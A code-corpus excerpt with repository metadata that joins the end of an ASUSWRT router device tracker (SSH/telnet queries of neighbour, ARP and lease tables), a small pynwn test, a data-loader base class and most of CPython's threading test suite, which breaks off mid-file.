_LOGGER.error('Unable to connect via SSH: %s', str(err))
return None
try:
ssh.sendline(_IP_NEIGH_CMD)
ssh.prompt()
neighbors = ssh.before.split(b'\n')[1:-1]
if self.mode == 'ap':
ssh.sendline(_ARP_CMD)
ssh.prompt()
arp_result = ssh.before.split(b'\n')[1:-1]
ssh.sendline(_WL_CMD)
ssh.prompt()
leases_result = ssh.before.split(b'\n')[1:-1]
else:
arp_result = ['']
ssh.sendline(_LEASES_CMD)
ssh.prompt()
leases_result = ssh.before.split(b'\n')[1:-1]
ssh.logout()
return AsusWrtResult(neighbors, leases_result, arp_result)
except pxssh.ExceptionPxssh as exc:
_LOGGER.error('Unexpected response from router: %s', exc)
return None
def telnet_connection(self):
"""Retrieve data from ASUSWRT via the telnet protocol."""
try:
telnet = telnetlib.Telnet(self.host)
telnet.read_until(b'login: ')
telnet.write((self.username + '\n').encode('ascii'))
telnet.read_until(b'Password: ')
telnet.write((self.password + '\n').encode('ascii'))
prompt_string = telnet.read_until(b'#').split(b'\n')[-1]
telnet.write('{}\n'.format(_IP_NEIGH_CMD).encode('ascii'))
neighbors = telnet.read_until(prompt_string).split(b'\n')[1:-1]
if self.mode == 'ap':
telnet.write('{}\n'.format(_ARP_CMD).encode('ascii'))
arp_result = (telnet.read_until(prompt_string).
split(b'\n')[1:-1])
telnet.write('{}\n'.format(_WL_CMD).encode('ascii'))
leases_result = (telnet.read_until(prompt_string).
split(b'\n')[1:-1])
else:
arp_result = ['']
telnet.write('{}\n'.format(_LEASES_CMD).encode('ascii'))
leases_result = (telnet.read_until(prompt_string).
split(b'\n')[1:-1])
telnet.write('exit\n'.encode('ascii'))
return AsusWrtResult(neighbors, leases_result, arp_result)
except EOFError:
_LOGGER.error('Unexpected response from router')
return None
except ConnectionRefusedError:
_LOGGER.error('Connection refused by router, is telnet enabled?')
return None
except socket.gaierror as exc:
_LOGGER.error('Socket exception: %s', exc)
return None
except OSError as exc:
_LOGGER.error('OSError: %s', exc)
return None
def get_asuswrt_data(self):
"""Retrieve data from ASUSWRT and return parsed result."""
if self.protocol == 'ssh':
result = self.ssh_connection()
elif self.protocol == 'telnet':
result = self.telnet_connection()
else:
# autodetect protocol
result = self.ssh_connection()
if result:
self.protocol = 'ssh'
else:
result = self.telnet_connection()
if result:
self.protocol = 'telnet'
if not result:
return {}
devices = {}
if self.mode == 'ap':
for lease in result.leases:
match = _WL_REGEX.search(lease.decode('utf-8'))
if not match:
_LOGGER.warning('Could not parse wl row: %s', lease)
continue
host = ''
# match mac addresses to IP addresses in ARP table
for arp in result.arp:
if match.group('mac').lower() in arp.decode('utf-8'):
arp_match = _ARP_REGEX.search(arp.decode('utf-8'))
if not arp_match:
_LOGGER.warning('Could not parse arp row: %s', arp)
continue
devices[arp_match.group('ip')] = {
'host': host,
'status': '',
'ip': arp_match.group('ip'),
'mac': match.group('mac').upper(),
}
else:
for lease in result.leases:
match = _LEASES_REGEX.search(lease.decode('utf-8'))
if not match:
_LOGGER.warning('Could not parse lease row: %s', lease)
continue
# For leases where the client doesn't set a hostname, ensure it
# is blank and not '*', which breaks entity_id down the line.
host = match.group('host')
if host == '*':
host = ''
devices[match.group('ip')] = {
'host': host,
'status': '',
'ip': match.group('ip'),
'mac': match.group('mac').upper(),
}
for neighbor in result.neighbors:
match = _IP_NEIGH_REGEX.search(neighbor.decode('utf-8'))
if not match:
_LOGGER.warning('Could not parse neighbor row: %s', neighbor)
continue
if match.group('ip') in devices:
devices[match.group('ip')]['status'] = match.group('status')
return devices
| 36.097087 | 79 | 0.54393 |
b181edf21e0f6a8095b726474d2c27281ebbde27 | 146 | py | Python | tests/test_resources.py | jd28/pynwn | ed0f4a44cf12238615c530cacde626f7e0d17fea | [
"MIT"
] | 8 | 2016-01-05T16:45:41.000Z | 2020-04-30T10:06:30.000Z | tests/test_resources.py | jd28/pynwn | ed0f4a44cf12238615c530cacde626f7e0d17fea | [
"MIT"
] | 2 | 2018-03-19T22:45:56.000Z | 2022-03-30T19:53:30.000Z | tests/test_resources.py | jd28/pynwn | ed0f4a44cf12238615c530cacde626f7e0d17fea | [
"MIT"
] | 6 | 2016-01-05T16:40:01.000Z | 2020-12-03T05:26:08.000Z | import pynwn
def test_resource_construction():
r = pynwn.Resource("hello", pynwn.ResourceType.twoda)
assert r.filename() == "hello.2da"
| 20.857143 | 57 | 0.712329 |
55e9926175d43c6f5488530d09338ab07b7a2ebd | 224 | py | Python | base/base_data_loader.py | junronglau/tweet-phrases-extraction | 6cace59fd38d62cec212f959447f81c42dc971ea | [
"Apache-2.0"
] | null | null | null | base/base_data_loader.py | junronglau/tweet-phrases-extraction | 6cace59fd38d62cec212f959447f81c42dc971ea | [
"Apache-2.0"
] | 2 | 2021-08-25T16:05:12.000Z | 2022-02-10T01:23:36.000Z | base/base_data_loader.py | junronglau/tweet-phrases-extraction | 6cace59fd38d62cec212f959447f81c42dc971ea | [
"Apache-2.0"
] | null | null | null | class BaseDataLoader(object):
def __init__(self, config):
self.config = config
def get_train_data(self):
raise NotImplementedError
def get_test_data(self):
raise NotImplementedError
| 22.4 | 33 | 0.674107 |
da17e1281d9867df40953b88c7d4d7f6d3589a92 | 50,616 | py | Python | Lib/test/test_threading.py | nsiregar/cpython | 6467134307cf01802c9f1c0384d8acbebecbd400 | [
"CNRI-Python-GPL-Compatible"
] | 1 | 2020-03-29T21:43:55.000Z | 2020-03-29T21:43:55.000Z | Lib/test/test_threading.py | lwd-temp/cpython | 34a49aa3e4d023b5f9e9029f4f1ec68f1a8a8120 | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | Lib/test/test_threading.py | lwd-temp/cpython | 34a49aa3e4d023b5f9e9029f4f1ec68f1a8a8120 | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | """
Tests for the threading module.
"""
import test.support
from test.support import verbose, import_module, cpython_only
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
import signal
import textwrap
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('netbsd5', 'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if hasattr(threading, 'get_native_id'):
native_ids = set(t.native_id for t in threads) | {threading.get_native_id()}
self.assertNotIn(None, native_ids)
self.assertEqual(len(native_ids), NUMTASKS + 1)
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=support.SHORT_TIMEOUT)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_running_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
pid, status = os.waitpid(pid, 0)
self.assertTrue(os.WIFEXITED(status))
self.assertEqual(10, os.WEXITSTATUS(status))
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
os.waitpid(pid, 0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
os.waitpid(pid, 0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_finalization_shutdown(self):
# bpo-36402: Py_Finalize() calls threading._shutdown() which must wait
# until Python thread states of all non-daemon threads get deleted.
#
# Test similar to SubinterpThreadingTests.test_threads_join_2(), but
# test the finalization of the main interpreter.
code = """if 1:
import os
import threading
import time
import random
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_Finalize() is called.
random_sleep()
tls.x = Sleeper()
random_sleep()
threading.Thread(target=f).start()
random_sleep()
"""
rc, out, err = assert_python_ok("-c", code)
self.assertEqual(err, b"")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=support.SHORT_TIMEOUT), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
@cpython_only
def test_shutdown_locks(self):
for daemon in (False, True):
with self.subTest(daemon=daemon):
event = threading.Event()
thread = threading.Thread(target=event.wait, daemon=daemon)
# Thread.start() must add lock to _shutdown_locks,
# but only for non-daemon thread
thread.start()
tstate_lock = thread._tstate_lock
if not daemon:
self.assertIn(tstate_lock, threading._shutdown_locks)
else:
self.assertNotIn(tstate_lock, threading._shutdown_locks)
# unblock the thread and join it
event.set()
thread.join()
# Thread._stop() must remove tstate_lock from _shutdown_locks.
# Daemon threads must never add it to _shutdown_locks.
self.assertNotIn(tstate_lock, threading._shutdown_locks)
def test_locals_at_exit(self):
# bpo-19466: thread locals must not be deleted before destructors
# are called
rc, out, err = assert_python_ok("-c", """if 1:
import threading
class Atexit:
def __del__(self):
print("thread_dict.atexit = %r" % thread_dict.atexit)
thread_dict = threading.local()
thread_dict.atexit = "value"
atexit = Atexit()
""")
self.assertEqual(out.rstrip(), b"thread_dict.atexit = 'value'")
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
with open(os.__file__, 'rb') as in_f:
stuff = in_f.read(200)
with open(os.devnull, 'wb') as null_f:
null_f.write(stuff)
time.sleep(random.random() / 1995)
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(0)
else:
os._exit(1)
else:
_, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def pipe(self):
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
if hasattr(os, 'set_blocking'):
os.set_blocking(r, False)
return (r, w)
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_daemon_thread(self):
r, w = self.pipe()
code = textwrap.dedent(f"""
import threading
import sys
channel = open({w}, "w", closefd=False)
def func():
pass
thread = threading.Thread(target=func, daemon=True)
try:
thread.start()
except RuntimeError as exc:
print("ok: %s" % exc, file=channel, flush=True)
else:
thread.join()
print("fail: RuntimeError not raised", file=channel, flush=True)
""")
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
msg = os.read(r, 100).decode().rstrip()
self.assertEqual("ok: daemon thread are not supported "
"in subinterpreters", msg)
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
def test_recursion_limit(self):
# Issue 9670
